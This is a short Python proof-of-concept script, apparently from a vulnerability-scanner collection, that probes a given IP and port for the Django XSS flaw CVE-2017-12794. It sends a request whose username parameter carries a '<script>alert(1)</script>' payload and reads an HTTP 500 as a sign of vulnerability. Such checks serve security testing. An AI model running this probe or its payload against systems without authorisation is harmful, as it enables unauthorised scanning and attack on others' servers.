#!/usr/bin/env python
#-*- coding: utf-8 -*-

import requests
import sys
from json_parse import Jsonparse

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0"
}

class django(object):
    def __init__(self,ip,port,level):
        self.ip = ip
        self.port = port
        self.level = level

    def run(self):
        url = 'http://'+self.ip+':'+str(self.port)+'/create_user/?username=<script>alert(1)</script>'
        print(url)
        try:
            req = requests.get(url=url, headers = headers, timeout = self.level)
            print(req.status_code)
            if req.status_code == 500:
                print('success')
                exit(0)
            else:
                print('NO vul CVE-2017-12794')
        except Exception as e:
            print(e)
            exit(-1)


if __name__ == '__main__':
    jsonfile = sys.argv[1] + '\\poc\\lib\\config.json'
    jsonobj = Jsonparse(jsonfile)
    jsondata = jsonobj.parse()
    targetip = sys.argv[2]
    timeout = jsondata['timeout2']
    port = sys.argv[3]
    obj = django(targetip, port, timeout)
    obj.run()
